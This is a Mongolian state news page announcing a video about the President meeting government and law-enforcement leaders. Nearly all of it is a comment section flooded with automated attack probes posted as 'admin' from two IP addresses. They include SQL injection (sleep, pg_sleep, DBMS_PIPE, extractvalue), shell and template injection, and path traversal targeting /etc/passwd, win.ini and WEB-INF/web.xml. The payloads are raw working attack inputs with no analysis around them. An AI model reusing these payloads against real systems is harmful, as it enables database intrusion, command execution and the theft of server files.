Монгол Улсын Ерөнхийлөгч үүссэн асуудалтай холбоотойгоор Засгийн газар, хууль хүчний байгууллагын удирдлагуудтай уулзлаа

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-12-07 15:16:57
Холбоотой мэдээ
Сэтгэгдлүүд
 • admin 185.234.72.114 582 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('i',13)='i
 • admin 185.234.72.114 582 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('c',0)='c
 • admin 185.234.72.114 582 өдөр

  123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('o',13)
 • admin 185.234.72.114 582 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('v',0)
 • admin 185.234.72.114 582 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:13
 • admin 185.234.72.114 582 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 185.234.72.114 582 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:13'/**/
 • admin 185.234.72.114 582 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 185.234.72.114 582 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(13))::text>'0
 • admin 185.234.72.114 582 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 185.234.72.114 582 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(13))>0/**/
 • admin 185.234.72.114 582 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 185.234.72.114 582 өдөр

  123456"and(select*from(select+sleep(13))a/**/union/**/select+1)="
 • admin 185.234.72.114 582 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 185.234.72.114 582 өдөр

  123456'and(select*from(select+sleep(13))a/**/union/**/select+1)='
 • admin 185.234.72.114 582 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 185.234.72.114 582 өдөр

  (select*from(select+sleep(13)union/**/select+1)a)
 • admin 185.234.72.114 582 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 185.234.72.114 582 өдөр

  123456"and"y"="v
 • admin 185.234.72.114 582 өдөр

  123456"and"a"="a
 • admin 185.234.72.114 582 өдөр

  123456'and's'='a
 • admin 185.234.72.114 582 өдөр

  123456'and'y'='y
 • admin 185.234.72.114 582 өдөр

  123456/**/and+2=8
 • admin 185.234.72.114 582 өдөр

  123456/**/and+3=3
 • admin 185.234.72.114 582 өдөр

  123456'"\(
 • admin 185.234.72.114 582 өдөр

  123456鎈'"\(
 • admin 185.234.72.114 582 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1568157534')))>'0
 • admin 185.234.72.114 582 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1547612773')))
 • admin 185.234.72.114 582 өдөр

  123456/**/and/**/cast(md5('1689724193')as/**/int)>0
 • admin 185.234.72.114 582 өдөр

  123456'and(select'1'from/**/cast(md5(1370709544)as/**/int))>'0
 • admin 185.234.72.114 582 өдөр

  extractvalue(1,concat(char(126),md5(1689595340)))
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',13)='s 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1849559385)))and"
 • admin 185.234.72.114 582 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1727911125)))and'
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('n',0)='n 185.234.72.114 582 өдөр

  123456
 • expr 918772113 + 881734099 185.234.72.114 582 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:13 185.234.72.114 582 өдөр

  123456
 • admin&set /A 954420589+923669258 185.234.72.114 582 өдөр

  123456
 • <%- 911302789+804103196 %> 185.234.72.114 582 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 582 өдөр

  123456
 • admin$(expr 887344102 + 938988529) 185.234.72.114 582 өдөр

  123456
 • admin|expr 889532497 + 848920282 185.234.72.114 582 өдөр

  123456
 • admin expr 841448866 + 838915791 185.234.72.114 582 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(13))::text>'0 185.234.72.114 582 өдөр

  123456
 • #set($c=874176141+957876153)${c}$c 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  expr 856730456 + 814439144
 • ${(862829396+971216945)?c} 185.234.72.114 582 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  123456&set /A 976717350+930674754
 • admin"and(select*from(select+sleep(13))a/**/union/**/select+1)=" 185.234.72.114 582 өдөр

  123456
 • ${916874482+856497221} 185.234.72.114 582 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 582 өдөр

  123456
 • /*1*/{{986152870+939483703}} 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  123456$(expr 945069794 + 966160165)
 • admin'and(select*from(select+sleep(13))a/**/union/**/select+1)=' 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  <%- 994639464+968037403 %>
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  #set($c=851964264+870069267)${c}$c
 • admin 185.234.72.114 582 өдөр

  123456|expr 882521822 + 841421424
 • admin 185.234.72.114 582 өдөр

  ${(962564850+929073017)?c}
 • admin 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  123456 expr 882185961 + 850709832
 • admin'"\( 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  ${987906790+975099545}
 • admin鎈'"\( 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1815172199')))>'0 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  /*1*/{{880812964+893046881}}
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1666673155'))) 185.234.72.114 582 өдөр

  123456
 • admin/**/and/**/cast(md5('1515020614')as/**/int)>0 185.234.72.114 582 өдөр

  123456
 • '-var_dump(md5(841736113))-' 185.234.72.114 582 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1265983791)as/**/int))>'0 185.234.72.114 582 өдөр

  123456
 • ${@var_dump(md5(979133267))}; 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  '-var_dump(md5(424601497))-'
 • extractvalue(1,concat(char(126),md5(1928492747))) 185.234.72.114 582 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 582 өдөр

  123456
 • admin"and"m"="q 185.234.72.114 582 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1569098908)))and" 185.234.72.114 582 өдөр

  123456
 • admin"and"u"="u 185.234.72.114 582 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1572197797)))and' 185.234.72.114 582 өдөр

  123456
 • ${824625232+871009895} 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  123456
 • hyxlkoihdqbhqtyefdwg 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  123456
 • admin'and'u'='t 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  ${@var_dump(md5(876892099))};
 • admin'and'l'='l 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  hyxlkoihdqbhqtyefdwg
 • admin 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  ${916881089+956808033}
 • admin 185.234.72.114 582 өдөр

  123456
 • admin 185.234.72.114 582 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',4)='l
 • admin 194.163.191.42 583 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('n',0)='n
 • admin 194.163.191.42 583 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('i',4)
 • admin 194.163.191.42 583 өдөр

  123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('e',0)
 • admin 194.163.191.42 583 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:4
 • admin 194.163.191.42 583 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 194.163.191.42 583 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:4'/**/
 • admin 194.163.191.42 583 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 194.163.191.42 583 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 194.163.191.42 583 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(4))>0/**/
 • admin 194.163.191.42 583 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 194.163.191.42 583 өдөр

  123456"and(select*from(select+sleep(4))a/**/union/**/select+1)="
 • admin 194.163.191.42 583 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 194.163.191.42 583 өдөр

  123456'and(select*from(select+sleep(4))a/**/union/**/select+1)='
 • admin 194.163.191.42 583 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 194.163.191.42 583 өдөр

  (select*from(select+sleep(4)union/**/select+1)a)
 • admin 194.163.191.42 583 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 194.163.191.42 583 өдөр

  123456"and"w"="k
 • admin 194.163.191.42 583 өдөр

  123456"and"x"="x
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 583 өдөр

  123456
 • ../../../../WEB-INF/web.xml 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456'and'g'='l
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 583 өдөр

  123456
 • ../../../WEB-INF/web.xml 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456'and'i'='i
 • ../../WEB-INF/web.xml;admin 194.163.191.42 583 өдөр

  123456
 • ../../WEB-INF/web.xml 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456/**/and+4=7
 • ../WEB-INF/web.xml;admin 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456/**/and+1=1
 • ../WEB-INF/web.xml 194.163.191.42 583 өдөр

  123456
 • WEB-INF/web.xml;admin 194.163.191.42 583 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 583 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 583 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 583 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 583 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 583 өдөр

  123456
 • ../../../../../../Windows/win.ini 194.163.191.42 583 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 583 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 583 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 583 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 583 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 583 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 583 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 583 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 583 өдөр

  123456
 • admin'"\( 194.163.191.42 583 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 583 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 583 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1269931632')))>'0 194.163.191.42 583 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 583 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1975477442'))) 194.163.191.42 583 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 583 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('i',4)='i 194.163.191.42 583 өдөр

  123456
 • admin/**/and/**/cast(md5('1863839394')as/**/int)>0 194.163.191.42 583 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 583 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',0)='u 194.163.191.42 583 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  expr 919327223 + 890935305
 • admin'and(select'1'from/**/cast(md5(1448819899)as/**/int))>'0 194.163.191.42 583 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:4 194.163.191.42 583 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456&set /A 966738403+806385114
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 583 өдөр

  123456
 • /etc/passwd 194.163.191.42 583 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1970376628))) 194.163.191.42 583 өдөр

  123456
 • <%- 875854486+991580862 %> 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456$(expr 967313705 + 923188283)
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 583 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(4))::text>'0 194.163.191.42 583 өдөр

  123456
 • #set($c=999670167+944281950)${c}$c 194.163.191.42 583 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1709932648)))and" 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456|expr 831046362 + 985255256
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 583 өдөр

  123456
 • ${(863755229+966273136)?c} 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456 expr 903613120 + 923367345
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 583 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1464855659)))and' 194.163.191.42 583 өдөр

  123456
 • admin"and(select*from(select+sleep(4))a/**/union/**/select+1)=" 194.163.191.42 583 өдөр

  123456
 • ${878073153+839827619} 194.163.191.42 583 өдөр

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456'"\(
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456鎈'"\(
 • admin'and(select*from(select+sleep(4))a/**/union/**/select+1)=' 194.163.191.42 583 өдөр

  123456
 • ../../../../../../etc/passwdadmin 194.163.191.42 583 өдөр

  123456
 • /*1*/{{888649414+927408915}} 194.163.191.42 583 өдөр

  123456
 • ../../../../../../etc/passwd 194.163.191.42 583 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1028657629')))>'0
 • admin 194.163.191.42 583 өдөр

  <%- 946045276+830346380 %>
 • admin 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  #set($c=855881033+837938075)${c}$c
 • admin 194.163.191.42 583 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1072605673')))
 • admin 194.163.191.42 583 өдөр

  123456/**/and/**/cast(md5('1948852671')as/**/int)>0
 • admin 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  ${(911412886+989148293)?c}
 • admin 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456'and(select'1'from/**/cast(md5(1839486662)as/**/int))>'0
 • admin 194.163.191.42 583 өдөр

  ${950646167+807185772}
 • admin 194.163.191.42 583 өдөр

  ${958819560+822270497}
 • admin"and"z"="u 194.163.191.42 583 өдөр

  123456
 • '-var_dump(md5(953255272))-' 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  extractvalue(1,concat(char(126),md5(1895418544)))
 • admin 194.163.191.42 583 өдөр

  /*1*/{{950972222+909866875}}
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1967039742)))and"
 • ${@var_dump(md5(411648534))}; 194.163.191.42 583 өдөр

  123456
 • expr 853941129 + 874635680 194.163.191.42 583 өдөр

  123456
 • admin"and"u"="u 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  '-var_dump(md5(420256242))-'
 • admin&set /A 946324988+936401296 194.163.191.42 583 өдөр

  123456
 • admin'and'g'='x 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  ${@var_dump(md5(652654027))};
 • admin'and'e'='e 194.163.191.42 583 өдөр

  123456
 • admin$(expr 965706913 + 966209068) 194.163.191.42 583 өдөр

  123456
 • admin|expr 996438857 + 826072415 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1516146077)))and'
 • hhnrxodfgzkzqqtbhgkk 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456
 • admin expr 816590862 + 829151344 194.163.191.42 583 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 583 өдөр

  123456
 • ${987534748+853476761} 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  hhnrxodfgzkzqqtbhgkk
 • admin 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456
 • admin 194.163.191.42 583 өдөр

  123456